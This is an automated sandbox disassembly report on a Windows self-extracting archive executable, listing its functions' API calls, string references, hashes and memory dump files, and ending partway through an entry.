Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000), ref: 00401EB8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?), ref: 00401EC0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?), ref: 00401EC8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020), ref: 00401ED0
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?), ref: 00401ED8
Part of subcall function 00401DCA: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022), ref: 00401EE0
Part of subcall function 00401DCA: GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401EF3

SetLastError.KERNEL32(00000000,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 004022FF
GetLastError.KERNEL32(00000000,0041E89C,?,00000000), ref: 0040230E
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 00402335
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 0040233D
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0041E89C,?,00000000), ref: 0040234F

Strings

nowait, xrefs: 004020D7
waitall, xrefs: 004020A5
forcenowait, xrefs: 004020F4
shc, xrefs: 00402145
hidcon, xrefs: 004020BE
ExecuteParameters, xrefs: 004021D5
del, xrefs: 00402157

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy$??2@$CurrentDirectoryErrorLast$CommandInfoLineStartup_wtol
String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
API String ID: 3919891259-4019298132
Opcode ID: 749cfa1c108e6e8d4c39da9e623de6833d0caf24ff5e9a3af22b630671e4b7cf
Instruction ID: bb106943ed3ca53a05403cb5435deaebd1a3063295b86531880bb6a0f43f7546
Opcode Fuzzy Hash: 749cfa1c108e6e8d4c39da9e623de6833d0caf24ff5e9a3af22b630671e4b7cf
Instruction Fuzzy Hash: 2381C171E04115ABCB15BBA1D9595EE77B5AF40308F24403FE602772E1EABC1D82D78E

Function 004193AF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 004193DC
__p__fmode.MSVCRT ref: 004193F1
__p__commode.MSVCRT ref: 004193FF
__setusermatherr.MSVCRT ref: 0041942B
_initterm.MSVCRT ref: 00419441
__getmainargs.MSVCRT ref: 00419464
_initterm.MSVCRT ref: 00419474
GetStartupInfoA.KERNEL32(?), ref: 004194B3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004194D7
exit.KERNELBASE ref: 004194E7
_XcptFilter.MSVCRT ref: 004194F9

Strings

tA, xrefs: 0041945C, 0041945F

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: tA
API String ID: 801014965-3672045730
Opcode ID: dc2780e643d3aa43d0ff02281ab66ad3744fe9223783811662e40d569e6ea4b7
Instruction ID: 2bf29183f708790e43ece5c4b13c67657fe3397540b73bc69793bae2ed7e9e0f
Opcode Fuzzy Hash: dc2780e643d3aa43d0ff02281ab66ad3744fe9223783811662e40d569e6ea4b7
Instruction Fuzzy Hash: 9D41AAB5D44308AFCB21DFA5DC55AEA7FB8EB09314F20412FE841A7291D7785C82CB59

Function 00402D99 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000048,PreExtract,0041AA3C,0041E868), ref: 00402E0C
??3@YAXPAX@Z.MSVCRT(?,?,0041ABB8,00000000,PreExtract,0041AA3C,0041E868), ref: 00402E99
??3@YAXPAX@Z.MSVCRT(?,?,?,0041ABB8,00000000,PreExtract,0041AA3C,0041E868), ref: 00402EA1
??2@YAPAXI@Z.MSVCRT(00000000,PreExtract,0041AA3C,0041E868), ref: 00402EC1
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?), ref: 00402F4B
??3@YAXPAX@Z.MSVCRT(?,00000000,?), ref: 00402FB5
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403014
??3@YAXPAX@Z.MSVCRT(00406E3F,PreExtract,0041AA3C,0041E868), ref: 0040304C

Strings

ExtractMaskInclude, xrefs: 00402E25, 00402FFA
PreExtract, xrefs: 00402DA8
ExtractMaskExclude, xrefs: 00402E31, 00402FDF

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@
String ID: ExtractMaskExclude$ExtractMaskInclude$PreExtract
API String ID: 4113381792-1386291556
Opcode ID: 65b864c0881956e057211817cab91c73a09b8b55b57162c10cc8b972a36fdcc9
Instruction ID: 7269ace4ee49ce545d33163e420a246a4dc032d25f4e3fe66d88e93700a2274f
Opcode Fuzzy Hash: 65b864c0881956e057211817cab91c73a09b8b55b57162c10cc8b972a36fdcc9
Instruction Fuzzy Hash: E1816B70E002099BDF14EFA2C955AEEBBB5AF44314F10406FE902BB2D1EB785D85CB49

Function 0040391C Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 00403928
CreateWindowExW.USER32(00000080,tooltips_class32,sfx,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403945
GetDesktopWindow.USER32 ref: 00403951
GetWindowRect.USER32(00000000), ref: 00403958
SetWindowPos.USER32(00000000,00000000,?,00406147,00000000,00000000,00000004), ref: 0040397C
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 0040398C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00403999
DispatchMessageW.USER32(?), ref: 004039A3
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 004039AC

Strings

tooltips_class32, xrefs: 0040393B
sfx, xrefs: 00403936

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Window$MessageTimer$CreateDesktopDispatchHandleKillModuleRect
String ID: sfx$tooltips_class32
API String ID: 3184818434-2224206080
Opcode ID: 1e623c50025d9644a4636d0dfc4539322a9a884a8d1c9db3723c20974edf1361
Instruction ID: bab660aaf1360166561ca95da768f7ace0d5693b3f23dfe4253bd0ab20d9046d
Opcode Fuzzy Hash: 1e623c50025d9644a4636d0dfc4539322a9a884a8d1c9db3723c20974edf1361
Instruction Fuzzy Hash: E411AC72902224BFCB109BB99C4CEEF3F7DEB49721F008020F605E2290CA749040CBBA

Function 00401CC0 Relevance: 15.1, APIs: 10, Instructions: 84
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

memset.MSVCRT ref: 00401CE6
ShowWindow.USER32(0002042C,00000005,?,0041A9F0,00000000), ref: 00401D3E
BringWindowToTop.USER32(?), ref: 00401D47
??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041A9F0,00000000), ref: 00401D69
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041A9F0,00000000), ref: 00401D71
ShellExecuteExW.SHELL32(0000003C), ref: 00401D8B
WaitForSingleObject.KERNEL32(?,000000FF,?,0041A9F0,00000000), ref: 00401D9E
CloseHandle.KERNEL32(?,?,0041A9F0,00000000), ref: 00401DA7
??3@YAXPAX@Z.MSVCRT(?,?,0041A9F0,00000000), ref: 00401DB3
??3@YAXPAX@Z.MSVCRT(?,?,?,0041A9F0,00000000), ref: 00401DBB

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$Window$??2@BringCloseExecuteHandleObjectShellShowSingleWaitmemset
String ID:
API String ID: 1117119541-0
Opcode ID: dbc48e129d0eb20d58e4881a689d0cad806e146c2747ea5d7dc8d94f0a4b95a3
Instruction ID: 93afddeaf3da2945c8596fa82df557d0c9d3bebd8f4b061b1b635e28d7e4d180
Opcode Fuzzy Hash: dbc48e129d0eb20d58e4881a689d0cad806e146c2747ea5d7dc8d94f0a4b95a3
Instruction Fuzzy Hash: 35316971E00209ABDF11DFE5DC49ADEBBB5FF44304F10802AE512B62A4EB7C6994CB18

Function 00414E08 Relevance: 11.0, APIs: 7, Instructions: 497
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414E11
??2@YAPAXI@Z.MSVCRT(00000038), ref: 00414F0B
??2@YAPAXI@Z.MSVCRT(00000038), ref: 00414F5D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00415239
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00415275
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004152EC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0041530B

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@$H_prolog
String ID:
API String ID: 417953191-0
Opcode ID: 7ea25d764ab3e8e74e973da5d08c9edd31676f2b299df5307136354e582712ee
Instruction ID: e5ac9cdd0bbed24d41e0b9fd9aa7c31187e14acbe242ba4463aa1c93b9762be3
Opcode Fuzzy Hash: 7ea25d764ab3e8e74e973da5d08c9edd31676f2b299df5307136354e582712ee
Instruction Fuzzy Hash: 64123B75600649DFCB14DF68C894AEA7BB5BF89304F24416EF81A8B351DB39EC81CB58

Function 00404772 Relevance: 10.6, APIs: 7, Instructions: 133
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404781

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C

GetSystemTimeAsFileTime.KERNEL32(00402DFC,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047ED
GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047F4
memcpy.MSVCRT(?,0041AA3C,0041E869,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040483F
??3@YAXPAX@Z.MSVCRT(?,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404875
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C), ref: 004048A6
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,?,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C), ref: 004048BD

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$FileTimememcpy$AttributesSystemlstrlenwcsncpy
String ID:
API String ID: 1217483450-0
Opcode ID: ed139c1ee860ba26562bb483b6c7d05f4130d2673af2f7f9270a5cd0c4e607a0
Instruction ID: 89c85a9677983eca3fd09eb0c7f4f9a8a3de002ff802481e92c4df94bfbc2cfd
Opcode Fuzzy Hash: ed139c1ee860ba26562bb483b6c7d05f4130d2673af2f7f9270a5cd0c4e607a0
Instruction Fuzzy Hash: F5411ABA900151EADB207BA59841ABF76B4EF85704F548837EA02F32C1E73C8D4283DD

Function 00405502 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 00405513
#17.COMCTL32(?,?,00000000), ref: 0040551E

Part of subcall function 00403D6D: GetUserDefaultUILanguage.KERNEL32(0040552E,?,?,00000000), ref: 00403D77

Part of subcall function 00403DC8: GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
Part of subcall function 00403DC8: wsprintfW.USER32 ref: 00403E28
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E42
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403E5D
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E77
Part of subcall function 00403DC8: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E9C
Part of subcall function 00403DC8: SetLastError.KERNEL32(?), ref: 00403EC3
Part of subcall function 00403DC8: lstrlenA.KERNEL32(0041B930), ref: 00403EF9
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403F14
Part of subcall function 00403DC8: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46

Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403EBA
Part of subcall function 00403DC8: _wtol.MSVCRT ref: 00403F57
Part of subcall function 00403DC8: MultiByteToWideChar.KERNEL32(00000000,0041B930,00000001,00000000,00000002), ref: 00403F77

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004055A3
wsprintfW.USER32 ref: 004055B7

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9

Strings

kernel32, xrefs: 0040550E
SfxFolder%02d, xrefs: 004055B1

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$ErrorLast$??2@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: SfxFolder%02d$kernel32
API String ID: 2610933736-229743753
Opcode ID: 4f59de0ccd26ddab3e2610545df8152bf3f391f8ad542358498f73b56703a673
Instruction ID: fb37d50bbeb3418e991456411a156af5b0a8a8317b04918dd84ef7d62563be16
Opcode Fuzzy Hash: 4f59de0ccd26ddab3e2610545df8152bf3f391f8ad542358498f73b56703a673
Instruction Fuzzy Hash: 02219076950304AAE720AF77BC4AECA7BA8EF44705F10853FF415A61D0DA384984CF5C

Function 0040284E Relevance: 6.1, APIs: 4, Instructions: 99
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00402734,?,00000000,0041E868), ref: 00402879
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 0040289E
GetExitCodeThread.KERNELBASE(00000000,0041AA3C,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 00402903
SetLastError.KERNEL32(0041AA3C,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 00402943

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 2732711357-0
Opcode ID: 84fee42053e057f3378805e89464497ff8e350c1136537873458d8e55eef0d4b
Instruction ID: 8b2ec0040d8b5e9cc765cc96d666c658be7f578e6807eca23fde730058974b68
Opcode Fuzzy Hash: 84fee42053e057f3378805e89464497ff8e350c1136537873458d8e55eef0d4b
Instruction Fuzzy Hash: 8C31277A300201BADF356B11DE4DABB3B58FB85350F24823BF911B62D0D6B88881D71E

Function 0040317A Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,-00000001,004047E5,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract), ref: 00403181
GetLastError.KERNEL32(?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040318B
SetLastError.KERNEL32(000000B7,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040319B
GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004031A6

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 8433fba26e05a83753d4dc70028e505715306c94392b2ab9b50cde710c697177
Instruction ID: a90d619ace12dcc58cec56a8214a7704fd14c1b401374c1c4e5215055585a3f3
Opcode Fuzzy Hash: 8433fba26e05a83753d4dc70028e505715306c94392b2ab9b50cde710c697177
Instruction Fuzzy Hash: DDE092301451107AE6101F34AC0C6BB3A5C9B9EB23F184576F402E82D0D73C4906012A

Function 0040235E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

